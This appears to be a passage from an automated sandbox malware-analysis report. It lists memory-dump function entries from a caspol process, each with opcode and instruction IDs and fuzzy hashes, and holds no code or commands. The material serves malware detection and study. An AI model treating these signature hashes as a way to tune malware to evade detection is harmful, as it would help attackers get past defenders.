                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7e3f0594dba1a6cf1887991bef3e48e5dd83e5cba4d365cc0b6fcd7f3f04a7bd
                                                                      • Instruction ID: 6bfd1a7e5b62b61231cac142be51c74e192a260f6571f3f36835ae1fc6f490dc
                                                                      • Opcode Fuzzy Hash: 7e3f0594dba1a6cf1887991bef3e48e5dd83e5cba4d365cc0b6fcd7f3f04a7bd
                                                                      • Instruction Fuzzy Hash: D2013C35906228CFDF60CFA0CD40BEDBBB5EF49305F6850D9904DA7262C6359A86DF41
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8bd742d08b729647544b3a122298a2f5fa8a3419a04a7d459ea124ec6a1d93b2
                                                                      • Instruction ID: c6764420cfadcf417f6bdcb09e7532b164dc8685d9af06dfb9de2e4116191c9b
                                                                      • Opcode Fuzzy Hash: 8bd742d08b729647544b3a122298a2f5fa8a3419a04a7d459ea124ec6a1d93b2
                                                                      • Instruction Fuzzy Hash: 49F0A4B4E04209DFDB40DFB9D950AAEFBF5EB49300F5495AAC818E3351EB359A41DB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5f6490517a475f034281f8fbbe3ff57d1c292a409977e9a937d07f65061e8e62
                                                                      • Instruction ID: 450ef3ee57d4fc482fc2f34768d9c7d00f1147bcc39494ec92f4d273df523265
                                                                      • Opcode Fuzzy Hash: 5f6490517a475f034281f8fbbe3ff57d1c292a409977e9a937d07f65061e8e62
                                                                      • Instruction Fuzzy Hash: 5301A435918394CFDB20CB24C855AECBBB4BF06321F5882EA881E972E3D7348946CF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cb748fbbc1fca1027396ef4c8a81d6723c3a31117a146bc36eb67b78de8c2a34
                                                                      • Instruction ID: 2fd3bb0d5c4dc6985eceff2444ff92832bfe52a8128d45fab30405632d5d9a89
                                                                      • Opcode Fuzzy Hash: cb748fbbc1fca1027396ef4c8a81d6723c3a31117a146bc36eb67b78de8c2a34
                                                                      • Instruction Fuzzy Hash: 82019D759402289FEBA0DF54C891BD8B7B4AB09311F5484D9D608A3241DB399B85DF90
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ca2f11839b2f9d069a67a8bff5599b6753d43291611d8702dbbd38c31a66416e
                                                                      • Instruction ID: 92347d98cee80eae4632660dd6737fc83f3ca77ce5c58ba6376ab3c20f7fbc7a
                                                                      • Opcode Fuzzy Hash: ca2f11839b2f9d069a67a8bff5599b6753d43291611d8702dbbd38c31a66416e
                                                                      • Instruction Fuzzy Hash: 3CF03070D0420CDFDB00DFA5E9947ADBBB8AB49301F1091A5C409A3253D7341A41DF88